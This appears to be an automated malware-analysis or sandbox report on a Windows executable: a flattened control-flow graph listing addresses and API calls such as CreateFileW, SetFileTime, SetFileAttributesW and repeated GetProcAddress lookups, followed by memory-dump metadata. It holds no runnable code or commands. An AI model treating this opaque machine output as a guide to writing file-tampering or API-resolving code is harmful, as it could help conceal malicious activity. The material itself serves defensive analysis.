7f8173 7470->7471 7472 40fde0 TlsGetValue 7471->7472 7473 7f8180 7472->7473 7640 7f7400 7473->7640 7476 7f823e 7671 442eb0 7476->7671 7478 411d20 14 API calls 7480 7f81c7 7478->7480 7650 45e650 7480->7650 7482 4104b0 TlsGetValue 7484 7f8278 7482->7484 7483 7f81dd 7485 412220 18 API calls 7483->7485 7486 7f82c1 7484->7486 7487 7f8281 7484->7487 7488 7f8210 7485->7488 7741 437410 7486->7741 7716 57a950 7487->7716 7654 7f5410 7488->7654 7495 57a950 33 API calls 7499 7f82fa 7495->7499 7496 4104b0 TlsGetValue 7497 7f82b2 7496->7497 7500 40fde0 TlsGetValue 7497->7500 7498 411d20 14 API calls 7498->7476 7501 4104b0 TlsGetValue 7499->7501 7502 7f82bf 7500->7502 7503 7f830d 7501->7503 7745 437260 7502->7745 7504 40fde0 TlsGetValue 7503->7504 7504->7502 7507 7f8359 7509 7f883d 7507->7509 7510 7f8396 7507->7510 7508 437260 TlsGetValue 7511 7f8350 7508->7511 7815 7f8a80 7509->7815 7512 511410 57 API calls 7510->7512 7749 579290 7511->7749 7515 7f83b0 7512->7515 7516 410430 TlsGetValue 7515->7516 7518 7f83cf 7516->7518 7517 40fec0 TlsGetValue 7519 7f885a 7517->7519 7520 7f8524 7518->7520 7521 7f83e2 7518->7521 7523 40fec0 TlsGetValue 7519->7523 7522 411d20 14 API calls 7520->7522 7524 411d20 14 API calls 7521->7524 7525 7f854a 7522->7525 7526 7f886c 7523->7526 7527 7f8408 7524->7527 7528 45e650 33 API calls 7525->7528 7529 411d20 14 API calls 7526->7529 7530 45e650 33 API calls 7527->7530 7531 7f8560 7528->7531 7532 7f887f 7529->7532 7533 7f841e 7530->7533 7535 412220 18 API calls 7531->7535 7536 411e20 14 API calls 7532->7536 7534 412220 18 API calls 7533->7534 7537 7f8451 7534->7537 7538 7f8593 7535->7538 7539 7f8899 7536->7539 7540 411d20 14 API calls 7537->7540 7541 510740 50 API calls 7538->7541 7542 411e20 14 API calls 7539->7542 7543 7f8475 7540->7543 7544 7f85ad 7541->7544 7545 7f88b3 7542->7545 7548 411d20 14 API calls 7543->7548 7552 7f851f 7543->7552 7546 411d20 14 API calls 7544->7546 7547 40fec0 TlsGetValue 7545->7547 7546->7552 7549 7f88c5 7547->7549 7550 7f84a8 7548->7550 7551 411d20 14 API calls 7549->7551 7553 45e650 33 API calls 7550->7553 7554 7f88d8 7551->7554 7555 40fde0 TlsGetValue 7552->7555 7556 7f84be 7553->7556 7554->6962 7557 7f862b 7555->7557 7558 412220 18 API calls 7556->7558 7769 436880 7557->7769 7560 7f84f1 7558->7560 7758 510740 7560->7758 7561 7f8639 7563 7f87ff 7561->7563 7778 7f4670 7561->7778 7566 411d20 14 API calls 7563->7566 7574 7f8817 7566->7574 7567 411d20 14 API calls 7567->7552 7569 7f86ba 7570 411d20 14 API calls 7569->7570 7572 7f86dd 7570->7572 7575 45e650 33 API calls 7572->7575 7574->7517 7577 7f86f0 7575->7577 7579 412220 18 API calls 7577->7579 7581 7f8720 7579->7581 7583 411d20 14 API calls 7581->7583 7585 7f8749 7583->7585 7584 579ce0 80 API calls 7584->7569 7585->7563 7586 411d20 14 API calls 7585->7586 7587 7f8776 7586->7587 7588 45e650 33 API calls 7587->7588 7589 7f8789 7588->7589 7590 412220 18 API calls 7589->7590 7591 7f87b9 7590->7591 7808 579f50 7591->7808 7596 411d20 14 API calls 7596->7563 7598 411b70 TlsGetValue 7597->7598 7599 7f9158 7598->7599 7600 411b70 TlsGetValue 7599->7600 7601 7f916b 7600->7601 7602 411b70 TlsGetValue 7601->7602 7603 7f917b 7602->7603 7604 7f91bb 7603->7604 7605 440a70 33 API calls 7603->7605 7606 7f91f7 7604->7606 7607 440a70 33 API calls 7604->7607 7605->7604 7608 413560 14 API calls 7606->7608 7607->7606 7609 7f9222 7608->7609 7610 411d20 14 API calls 7609->7610 7611 7f9288 7610->7611 7612 45e650 33 API calls 7611->7612 7613 7f929b 7612->7613 7614 412220 18 API calls 7613->7614 7615 7f92cb 7614->7615 7616 411d20 14 API calls 7615->7616 7617 7f9304 7616->7617 7618 440a70 33 API calls 7617->7618 7619 7f9343 7617->7619 7618->7619 7620 413390 18 API calls 7619->7620 7622 7f94cb 7620->7622 7621 7f9525 7624 411d20 14 API calls 7621->7624 7622->7621 7623 413390 18 API calls 7622->7623 7623->7621 7625 7f956c 7624->7625 7626 45e650 33 API calls 7625->7626 7627 7f957f 7626->7627 7628 412220 18 API calls 7627->7628 7629 7f95ac 7628->7629 7818 7fb0f0 7629->7818 7632 411d20 14 API calls 7633 7f9603 7632->7633 7634 7f9633 7633->7634 7635 40ced0 TlsGetValue 7633->7635 7636 411d20 14 API calls 7634->7636 7635->7634 7637 7f965d 7636->7637 7638 411e20 14 API calls 7637->7638 7639 7f8155 7638->7639 7639->7470 7643 7f7443 7640->7643 7649 7f74f9 7640->7649 7641 40fde0 TlsGetValue 7642 7f7519 7641->7642 7642->7476 7642->7478 7643->7649 7824 44b3d0 7643->7824 7645 7f74c7 7828 44b130 7645->7828 7647 7f74ec 7648 410430 TlsGetValue 7647->7648 7648->7649 7649->7641 7651 45e65d 7650->7651 7652 45e67b 7651->7652 7653 440a70 33 API calls 7651->7653 7652->7483 7653->7652 7655 7f543f 7654->7655 7656 7f545b 7655->7656 7657 7f544a 7655->7657 7658 44afb0 35 API calls 7656->7658 7866 44afb0 7657->7866 7660 7f5455 7658->7660 7661 44b130 50 API calls 7660->7661 7662 7f54a8 7661->7662 7663 410430 TlsGetValue 7662->7663 7664 7f54b5 7663->7664 7665 40fde0 TlsGetValue 7664->7665 7666 7f54bf 7665->7666 7667 40fde0 TlsGetValue 7666->7667 7668 7f54d3 7667->7668 7669 413560 14 API calls 7668->7669 7670 7f54e6 7669->7670 7670->7498 7672 442f1a 7671->7672 7673 442f42 7672->7673 7674 442f57 7672->7674 7675 410430 TlsGetValue 7673->7675 7676 443014 7674->7676 7677 442f68 7674->7677 7715 442f52 7675->7715 7678 4104b0 TlsGetValue 7676->7678 7870 434b10 7677->7870 7681 443024 7678->7681 7680 40fec0 TlsGetValue 7683 443761 7680->7683 7684 4104b0 TlsGetValue 7681->7684 7682 442f78 7875 434b60 7682->7875 7686 413560 14 API calls 7683->7686 7690 442fe9 7684->7690 7687 443774 7686->7687 7688 40fec0 TlsGetValue 7687->7688 7689 443786 7688->7689 7689->7482 7695 443059 7690->7695 7702 44313e 7690->7702 7691 442f99 7692 442fd6 7691->7692 7693 442feb 7691->7693 7694 4104b0 TlsGetValue 7692->7694 7696 434b10 TlsGetValue 7693->7696 7694->7690 7697 40fde0 TlsGetValue 7695->7697 7696->7690 7710 443062 7697->7710 7698 4431cb 7699 4431d4 7698->7699 7700 443741 7698->7700 7703 4431f5 7699->7703 7704 44332d 7699->7704 7701 410430 TlsGetValue 7700->7701 7701->7715 7702->7698 7707 413390 18 API calls 7702->7707 7705 4113d0 TlsGetValue 7703->7705 7706 4113d0 TlsGetValue 7704->7706 7705->7715 7706->7715 7707->7702 7708 4114b0 TlsGetValue 7708->7710 7710->7708 7711 4430be 7710->7711 7710->7715 7881 411190 7710->7881 7712 448740 TlsGetValue 7711->7712 7713 4430dd 7712->7713 7714 4114b0 TlsGetValue 7713->7714 7714->7715 7715->7680 7717 57a98c 7716->7717 7718 57a97a 7716->7718 7720 57a995 7717->7720 7726 57a9a7 7717->7726 7719 410430 TlsGetValue 7718->7719 7722 57a987 7719->7722 7723 410430 TlsGetValue 7720->7723 7721 57aa00 7887 57b7e0 7721->7887 7727 40fde0 TlsGetValue 7722->7727 7723->7722 7725 57aa11 7728 57aa22 7725->7728 7734 57aa31 7725->7734 7726->7721 7730 440a70 33 API calls 7726->7730 7732 57a9d4 7726->7732 7729 57aaa5 7727->7729 7731 410430 TlsGetValue 7728->7731 7729->7496 7730->7732 7731->7722 7732->7721 7733 440a70 33 API calls 7732->7733 7733->7721 7735 57aa57 7734->7735 7736 57aa8a 7734->7736 7738 411190 TlsGetValue 7735->7738 7737 411580 TlsGetValue 7736->7737 7737->7722 7739 57aa68 7738->7739 7740 4116b0 TlsGetValue 7739->7740 7740->7722 7742 43742e 7741->7742 7894 448700 7742->7894 7746 43727f 7745->7746 7747 448740 TlsGetValue 7746->7747 7748 4372cd 7747->7748 7748->7507 7748->7508 7898 57ae50 SetLastError 7749->7898 7756 40fde0 TlsGetValue 7757 5792ce 7756->7757 7757->7507 7759 51076f 7758->7759 7760 413390 18 API calls 7759->7760 7762 5107d3 7760->7762 7761 51082d 7763 413560 14 API calls 7761->7763 7762->7761 8004 50f240 7762->8004 8007 510620 7762->8007 7764 51083e 7763->7764 7766 413560 14 API calls 7764->7766 7767 51084f 7766->7767 7767->7567 7770 411140 7769->7770 7771 436899 GetFileAttributesW 7770->7771 7772 43692d GetLastError 7771->7772 7773 4368ad 7771->7773 7777 4368bc 7772->7777 7774 4368d2 CreateFileW 7773->7774 7773->7777 7775 436915 GetLastError 7774->7775 7776 436909 CloseHandle 7774->7776 7775->7777 7776->7777 7777->7561 7779 7f46ad 7778->7779 7781 7f46e5 7779->7781 8022 43c060 7779->8022 7781->7569 7782 579f60 7781->7782 8033 57a260 7782->8033 7785 579ce0 7786 579d34 7785->7786 7789 579d3f 7785->7789 7787 4090f0 TlsGetValue 7786->7787 7787->7789 7788 579dd2 SetLastError 8093 436cd0 7788->8093 7790 4090f0 TlsGetValue 7789->7790 7793 579d77 7789->7793 7790->7793 7791 4090f0 TlsGetValue 7794 579daf 7791->7794 7793->7788 7793->7791 7794->7788 7795 579de7 7796 579e11 CreateFileW 7795->7796 7797 579e8f CloseHandle SetLastError 7796->7797 7798 579e4c SetFileTime 7796->7798 7799 409120 TlsGetValue 7797->7799 7798->7797 7800 579ea9 7799->7800 7801 409120 TlsGetValue 7800->7801 7802 579eb2 7801->7802 7803 409120 TlsGetValue 7802->7803 7804 579ebb 7803->7804 7805 579f70 7804->7805 7806 57a260 47 API calls 7805->7806 7807 579f7b 7806->7807 7807->7584 7809 57a260 47 API calls 7808->7809 7810 579f5b 7809->7810 7811 57a040 7810->7811 7812 57a058 7811->7812 8300 436de0 7812->8300 7816 411d20 14 API calls 7815->7816 7817 7f8aa4 7816->7817 7817->7574 7819 7fb10b 7818->7819 7820 440a70 33 API calls 7819->7820 7822 7fb132 7819->7822 7820->7822 7821 412220 18 API calls 7823 7f95c1 7821->7823 7822->7821 7823->7632 7825 44b3ec 7824->7825 7826 44b3de 7824->7826 7825->7645 7844 44bb90 7826->7844 7829 44b155 7828->7829 7830 44b17c 7829->7830 7831 440a70 33 API calls 7829->7831 7832 440c20 50 API calls 7830->7832 7834 44b1b0 7830->7834 7831->7830 7832->7834 7833 44b1ef 7836 44b247 7833->7836 7837 440c20 50 API calls 7833->7837 7834->7833 7835 440c20 50 API calls 7834->7835 7835->7833 7856 44a6d0 7836->7856 7837->7836 7839 44b265 7840 44b28b 7839->7840 7842 440a70 33 API calls 7839->7842 7841 4113d0 TlsGetValue 7840->7841 7843 44b29e 7841->7843 7842->7840 7843->7647 7846 44bbaa 7844->7846 7848 44b5e0 7846->7848 7847 44bbde 7847->7825 7852 44b608 7848->7852 7849 44b624 GetACP 7851 44b63f GetCPInfo 7849->7851 7850 44b632 7850->7851 7853 44b66d 7851->7853 7854 44b682 7851->7854 7852->7849 7852->7850 7855 440a70 33 API calls 7853->7855 7854->7847 7855->7854 7857 44a6de 7856->7857 7864 44a6f8 7856->7864 7860 440a70 33 API calls 7857->7860 7857->7864 7858 44a72e 7861 440c20 50 API calls 7858->7861 7862 44a764 7858->7862 7859 440c20 50 API calls 7859->7858 7860->7864 7861->7862 7863 44a7b3 7862->7863 7865 440c20 50 API calls 7862->7865 7863->7839 7864->7858 7864->7859 7865->7863 7867 44afc0 7866->7867 7868 44afda 7866->7868 7867->7868 7869 44bb90 35 API calls 7867->7869 7868->7660 7869->7868 7871 410430 TlsGetValue 7870->7871 7872 434b21 7871->7872 7874 434b2f 7872->7874 7884 4106f0 7872->7884 7874->7682 7876 434b73 7875->7876 7877 4100a0 TlsGetValue 7876->7877 7878 434b8c 7877->7878 7879 434ba2 7878->7879 7880 434b98 CharLowerBuffW 7878->7880 7879->7691 7880->7879 7882 4100a0 TlsGetValue 7881->7882 7883 4111aa 7882->7883 7883->7710 7885 410610 TlsGetValue 7884->7885 7886 4106f9 7885->7886 7886->7874 7890 57b0d0 7887->7890 7889 57b7eb 7889->7725 7891 57b0e8 7890->7891 7893 57b10f 7890->7893 7892 440a70 33 API calls 7891->7892 7891->7893 7892->7893 7893->7889 7895 44871c 7894->7895 7896 4117a0 TlsGetValue 7895->7896 7897 437442 7896->7897 7897->7495 7899 4374d0 2 API calls 7898->7899 7900 57ae7d GetLastError 7899->7900 7901 57ae86 7900->7901 7902 57aeab 7900->7902 7901->7902 7904 43ea00 3 API calls 7901->7904 7903 40fde0 TlsGetValue 7902->7903 7905 5792b2 7903->7905 7906 57ae99 7904->7906 7908 579160 7905->7908 7937 440800 7906->7937 7941 579bc0 7908->7941 7910 579180 7916 5791bc 7910->7916 7960 57aef0 7910->7960 7912 40fde0 TlsGetValue 7913 5791ce 7912->7913 7917 436a90 7913->7917 7914 57919a 7915 440a70 33 API calls 7914->7915 7914->7916 7915->7916 7916->7912 7918 436abd 7917->7918 7919 436adf 7918->7919 7921 440a70 33 API calls 7918->7921 7999 442b60 7919->7999 7921->7919 7923 4104b0 TlsGetValue 7924 436b08 7923->7924 7925 436960 4 API calls 7924->7925 7927 436b13 7925->7927 7926 40fec0 TlsGetValue 7928 436b9f 7926->7928 7930 437200 TlsGetValue 7927->7930 7932 436b2a 7927->7932 7936 436b51 7927->7936 7929 40fde0 TlsGetValue 7928->7929 7931 436ba8 7929->7931 7930->7932 7931->7756 7933 437200 TlsGetValue 7932->7933 7932->7936 7934 436b6c 7933->7934 7935 436a90 37 API calls 7934->7935 7935->7936 7936->7926 7938 44081e 7937->7938 7939 410430 TlsGetValue 7938->7939 7940 440842 7939->7940 7940->7902 7975 57a3e0 7941->7975 7943 579be7 7979 57b460 7943->7979 7946 579c09 7986 434ce0 7946->7986 7947 440a70 33 API calls 7947->7946 7950 440a70 33 API calls 7951 579c3a 7950->7951 7952 440a70 33 API calls 7951->7952 7953 579c66 7951->7953 7952->7953 7954 579c9b 7953->7954 7996 579a10 7953->7996 7955 40fde0 TlsGetValue 7954->7955 7957 579cad 7955->7957 7957->7910 7959 440a70 33 API calls 7959->7954 7961 411190 TlsGetValue 7960->7961 7962 57af35 7961->7962 7963 411190 TlsGetValue 7962->7963 7964 57af46 7963->7964 7965 411580 TlsGetValue 7964->7965 7966 57af57 7965->7966 7967 4117a0 TlsGetValue 7966->7967 7968 57b068 7967->7968 7969 57b08a 7968->7969 7970 411190 TlsGetValue 7968->7970 7971 40fec0 TlsGetValue 7969->7971 7973 57b07d 7970->7973 7972 57b09a 7971->7972 7972->7914 7974 4114b0 TlsGetValue 7973->7974 7974->7969 7976 57a3ee 7975->7976 7977 440a70 33 API calls 7976->7977 7978 57a414 7976->7978 7977->7978 7978->7943 7980 434ce0 TlsGetValue 7979->7980 7983 57b490 7980->7983 7981 40fec0 TlsGetValue 7982 579bf0 7981->7982 7982->7946 7982->7947 7984 411190 TlsGetValue 7983->7984 7985 57b4c3 7983->7985 7984->7985 7985->7981 7987 434cf9 7986->7987 7991 434d38 7987->7991 7993 434d29 7987->7993 7988 434d55 7989 40fde0 TlsGetValue 7988->7989 7992 434d36 7989->7992 7990 434d5f 7994 448740 TlsGetValue 7990->7994 7991->7988 7991->7990 7992->7950 7992->7951 7995 410430 TlsGetValue 7993->7995 7994->7992 7995->7992 7997 436960 4 API calls 7996->7997 7998 579a19 7997->7998 7998->7954 7998->7959 8000 410430 TlsGetValue 7999->8000 8001 442b70 8000->8001 8002 436afb 8001->8002 8003 4113d0 TlsGetValue 8001->8003 8002->7923 8003->8002 8010 50f260 8004->8010 8016 510640 8007->8016 8011 50f289 8010->8011 8013 440a70 33 API calls 8011->8013 8014 50f2a9 8011->8014 8012 50f251 8012->7762 8013->8014 8014->8012 8015 440a70 33 API calls 8014->8015 8015->8014 8017 510669 8016->8017 8019 440a70 33 API calls 8017->8019 8020 510689 8017->8020 8018 510631 8018->7762 8019->8020 8020->8018 8021 440a70 33 API calls 8020->8021 8021->8020 8023 43c0c1 8022->8023 8024 43c070 8022->8024 8023->7781 8024->8023 8026 43bf60 8024->8026 8029 43bed0 8026->8029 8030 43bee3 8029->8030 8031 434200 50 API calls 8030->8031 8032 43bf19 8030->8032 8031->8032 8032->8023 8034 57a3e0 33 API calls 8033->8034 8035 57a297 8034->8035 8036 57b460 TlsGetValue 8035->8036 8037 57a2a0 8036->8037 8038 57a2b9 8037->8038 8039 440a70 33 API calls 8037->8039 8040 434ce0 TlsGetValue 8038->8040 8039->8038 8041 57a2ce 8040->8041 8042 440a70 33 API calls 8041->8042 8043 57a2ea 8041->8043 8042->8043 8044 57a316 8043->8044 8045 440a70 33 API calls 8043->8045 8046 57ae50 6 API calls 8044->8046 8045->8044 8047 57a32b 8046->8047 8060 57aad0 8047->8060 8050 436960 4 API calls 8051 57a346 8050->8051 8052 57a35f 8051->8052 8053 440a70 33 API calls 8051->8053 8054 57a394 8052->8054 8090 57a070 8052->8090 8053->8052 8056 40fec0 TlsGetValue 8054->8056 8058 579f6b 8056->8058 8058->7785 8059 440a70 33 API calls 8059->8054 8061 57ab26 8060->8061 8062 40fde0 TlsGetValue 8061->8062 8063 57ab33 8062->8063 8064 434ce0 TlsGetValue 8063->8064 8065 57ab43 8064->8065 8066 4104b0 TlsGetValue 8065->8066 8067 57ab53 8066->8067 8068 411190 TlsGetValue 8067->8068 8069 57ab64 8068->8069 8070 411190 TlsGetValue 8069->8070 8071 57ab75 8070->8071 8072 411580 TlsGetValue 8071->8072 8073 57ab86 8072->8073 8074 411190 TlsGetValue 8073->8074 8082 57abe6 8073->8082 8074->8082 8075 4117a0 TlsGetValue 8076 57ad8e 8075->8076 8077 410430 TlsGetValue 8076->8077 8078 57ad9e 8077->8078 8079 40fde0 TlsGetValue 8078->8079 8080 57ada8 8079->8080 8081 40fec0 TlsGetValue 8080->8081 8083 57adb8 8081->8083 8082->8075 8084 40fde0 TlsGetValue 8083->8084 8085 57adc1 8084->8085 8086 40fde0 TlsGetValue 8085->8086 8087 57adca 8086->8087 8088 40fde0 TlsGetValue 8087->8088 8089 57a338 8088->8089 8089->8050 8091 436880 5 API calls 8090->8091 8092 57a079 8091->8092 8092->8054 8092->8059 8094 411140 8093->8094 8095 436d01 GetFileAttributesW 8094->8095 8096 436d21 8095->8096 8097 436d84 8095->8097 8111 434060 8096->8111 8098 40fec0 TlsGetValue 8097->8098 8100 436d94 8098->8100 8101 40fde0 TlsGetValue 8100->8101 8102 436d9d 8101->8102 8102->7795 8103 436d34 8103->8097 8104 436d70 8103->8104 8105 437200 TlsGetValue 8103->8105 8106 436d79 GetFileAttributesW 8104->8106 8107 436d52 8105->8107 8106->8097 8124 442b00 8107->8124 8110 411580 TlsGetValue 8110->8104 8112 43408b 8111->8112 8113 434175 8112->8113 8114 436880 5 API calls 8112->8114 8113->8103 8115 4340a1 8114->8115 8115->8113 8129 436470 8115->8129 8117 4340b5 8117->8113 8118 4340ca GetFileAttributesW 8117->8118 8118->8113 8119 4340df 8118->8119 8119->8113 8120 434115 CreateFileW 8119->8120 8120->8113 8121 434150 8120->8121 8160 433d50 8121->8160 8125 410430 TlsGetValue 8124->8125 8126 442b10 8125->8126 8127 436d5f 8126->8127 8128 4114b0 TlsGetValue 8126->8128 8127->8110 8128->8127 8130 413390 18 API calls 8129->8130 8131 4364ca 8130->8131 8132 413390 18 API calls 8131->8132 8133 4364e8 8132->8133 8134 436960 4 API calls 8133->8134 8135 4364fe 8134->8135 8136 43650d 8135->8136 8137 436880 5 API calls 8135->8137 8140 436624 8136->8140 8194 4372f0 8136->8194 8137->8136 8142 417be0 33 API calls 8140->8142 8141 442b00 TlsGetValue 8143 436532 8141->8143 8144 436634 8142->8144 8146 43653e GetVolumeInformationW 8143->8146 8145 440800 TlsGetValue 8144->8145 8151 4365e3 8145->8151 8147 43661f 8146->8147 8150 436589 GetDriveTypeW 8146->8150 8204 443d70 GetLastError 8147->8204 8150->8151 8152 40fec0 TlsGetValue 8151->8152 8153 43665e 8152->8153 8154 413560 14 API calls 8153->8154 8155 43666e 8154->8155 8156 413560 14 API calls 8155->8156 8157 43667e 8156->8157 8158 40fde0 TlsGetValue 8157->8158 8159 43668a 8158->8159 8159->8117 8161 40fde0 TlsGetValue 8160->8161 8166 433dbf 8161->8166 8162 433e67 8163 433e7d CreateFileMappingW 8162->8163 8164 433f6a 8162->8164 8163->8164 8165 433ebe MapViewOfFile 8163->8165 8167 433e5b 8164->8167 8232 433c00 8164->8232 8168 433ef1 GetCurrentProcess 8165->8168 8169 433f5d CloseHandle 8165->8169 8166->8162 8180 433e27 8166->8180 8172 40fec0 TlsGetValue 8167->8172 8229 4234a0 8168->8229 8169->8164 8175 433fe0 CloseHandle 8172->8175 8174 433f11 8177 433f50 UnmapViewOfFile 8174->8177 8179 411240 TlsGetValue 8174->8179 8175->8113 8176 410430 TlsGetValue 8178 433f96 8176->8178 8177->8169 8178->8167 8183 433aa0 TlsGetValue 8178->8183 8181 433f29 8179->8181 8182 411240 TlsGetValue 8180->8182 8184 433aa0 TlsGetValue 8181->8184 8185 433e3b 8182->8185 8187 433fb9 8183->8187 8188 433f39 8184->8188 8217 433aa0 8185->8217 8191 410430 TlsGetValue 8187->8191 8189 410430 TlsGetValue 8188->8189 8192 433f49 8189->8192 8191->8167 8192->8177 8193 410430 TlsGetValue 8193->8167 8195 437309 8194->8195 8196 437324 8195->8196 8201 437344 8195->8201 8199 4117a0 TlsGetValue 8196->8199 8197 4373f1 8198 40fde0 TlsGetValue 8197->8198 8200 436522 8198->8200 8199->8200 8200->8141 8201->8197 8202 437383 8201->8202 8203 4117a0 TlsGetValue 8202->8203 8203->8200 8207 443d90 8204->8207 8208 443e03 8207->8208 8209 443daf 8207->8209 8211 440a70 33 API calls 8208->8211 8210 43ea00 TlsGetValue FormatMessageW LocalFree 8209->8210 8212 443dc8 8210->8212 8213 443e01 8211->8213 8214 440c20 50 API calls 8212->8214 8215 40fde0 TlsGetValue 8213->8215 8214->8213 8216 443d82 8215->8216 8216->8140 8222 433ae1 8217->8222 8218 433b94 8219 40fec0 TlsGetValue 8218->8219 8220 433bc4 8219->8220 8220->8193 8221 411240 TlsGetValue 8221->8222 8222->8218 8222->8221 8223 433b41 8222->8223 8224 4111e0 TlsGetValue 8223->8224 8225 433b69 8224->8225 8226 4117a0 TlsGetValue 8225->8226 8227 433b83 8226->8227 8228 411580 TlsGetValue 8227->8228 8228->8218 8243 422f10 8229->8243 8231 4234ba 8231->8174 8233 40fde0 TlsGetValue 8232->8233 8235 433c24 8233->8235 8234 433ce7 8234->8176 8237 433c49 8235->8237 8291 4208c0 8235->8291 8237->8234 8238 4090f0 TlsGetValue 8237->8238 8240 433c98 8238->8240 8239 433cdd 8242 409120 TlsGetValue 8239->8242 8240->8239 8241 4111e0 TlsGetValue 8240->8241 8241->8239 8242->8234 8244 422f3f 8243->8244 8245 422f22 8243->8245 8244->8231 8245->8244 8246 4208c0 TlsGetValue GetProcAddress 8245->8246 8247 422f59 8246->8247 8248 4208c0 TlsGetValue GetProcAddress 8247->8248 8249 422f73 8248->8249 8250 4208c0 TlsGetValue GetProcAddress 8249->8250 8251 422f8d 8250->8251 8252 4208c0 TlsGetValue GetProcAddress 8251->8252 8253 422fa7 8252->8253 8254 4208c0 TlsGetValue GetProcAddress 8253->8254 8255 422fc1 8254->8255 8256 4208c0 TlsGetValue GetProcAddress 8255->8256 8257 422fdb 8256->8257 8258 4208c0 TlsGetValue GetProcAddress 8257->8258 8259 422ff5 8258->8259 8260 4208c0 TlsGetValue GetProcAddress 8259->8260 8261 42300f 8260->8261 8262 4208c0 TlsGetValue GetProcAddress 8261->8262 8263 423029 8262->8263 8264 4208c0 TlsGetValue GetProcAddress 8263->8264 8265 423043 8264->8265 8266 4208c0 TlsGetValue GetProcAddress 8265->8266 8267 42305d 8266->8267 8268 4208c0 TlsGetValue GetProcAddress 8267->8268 8269 423077 8268->8269 8270 4208c0 TlsGetValue GetProcAddress 8269->8270 8271 423091 8270->8271 8272 4208c0 TlsGetValue GetProcAddress 8271->8272 8273 4230ab 8272->8273 8274 4208c0 TlsGetValue GetProcAddress 8273->8274 8275 4230c5 8274->8275 8276 4208c0 TlsGetValue GetProcAddress 8275->8276 8277 4230df 8276->8277 8278 4208c0 TlsGetValue GetProcAddress 8277->8278 8279 4230f9 8278->8279 8280 4208c0 TlsGetValue GetProcAddress 8279->8280 8281 423113 8280->8281 8282 4208c0 TlsGetValue GetProcAddress 8281->8282 8283 42312d 8282->8283 8284 4208c0 TlsGetValue GetProcAddress 8283->8284 8285 423147 8284->8285 8286 4208c0 TlsGetValue GetProcAddress 8285->8286 8287 423161 8286->8287 8288 4208c0 TlsGetValue GetProcAddress 8287->8288 8289 42317b 8288->8289 8290 4208c0 TlsGetValue GetProcAddress 8289->8290 8290->8244 8292 4208ea GetProcAddress 8291->8292 8293 4208fd 8291->8293 8294 420931 8292->8294 8295 4109e0 TlsGetValue 8293->8295 8296 40fe30 TlsGetValue 8294->8296 8298 42090e 8295->8298 8297 42093b 8296->8297 8297->8237 8299 40fe30 TlsGetValue 8298->8299 8299->8294 8301 4104b0 TlsGetValue 8300->8301 8302 436e26 8301->8302 8303 436e9e 8302->8303 8304 436e38 GetFileAttributesW 8302->8304 8305 436ea7 SetFileAttributesW 8303->8305 8304->8303 8306 436e48 8304->8306 8307 436eb6 GetLastError 8305->8307 8308 436ebe 8305->8308 8309 434060 73 API calls 8306->8309 8307->8308 8310 40fec0 TlsGetValue 8308->8310 8312 436e55 8309->8312 8311 436ece 8310->8311 8311->7596 8312->8303 8313 436e91 8312->8313 8314 437200 TlsGetValue 8312->8314 8315 4104b0 TlsGetValue 8313->8315 8316 436e73 8314->8316 8315->8303 8317 442b00 TlsGetValue 8316->8317 8318 436e80 8317->8318 8319 411580 TlsGetValue 8318->8319 8319->8313 8321 7f4953 8320->8321 8322 7f496c 8321->8322 8323 440a70 33 API calls 8321->8323 8322->6984 8323->8322 8325 7f48f4 8324->8325 8326 440a70 33 API calls 8325->8326 8327 7f490d 8325->8327 8326->8327 8327->6987 8329 7f484d 8328->8329 8330 7f4883 8329->8330 8331 440a70 33 API calls 8329->8331 8332 413560 14 API calls 8330->8332 8331->8330 8333 7f48a0 8332->8333 8333->6970 8335 40ff78 Sleep 8334->8335 8335->7015 8336 417be0 8337 417c0d 8336->8337 8344 417c47 8336->8344 8338 417c17 8337->8338 8339 417c49 8337->8339 8340 413d70 33 API calls 8338->8340 8341 4111e0 TlsGetValue 8339->8341 8342 417c22 8340->8342 8341->8344 8343 4100a0 TlsGetValue 8342->8343 8343->8344

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.4037054687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.4037020653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037054687.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037511854.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037532425.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037550515.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037569932.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037592517.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037612543.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037636218.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037659218.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037683299.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037706260.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037729580.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037752301.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037779465.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037806065.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037835991.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037856601.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037888171.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037919205.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037948996.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037980210.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038010016.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038041302.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
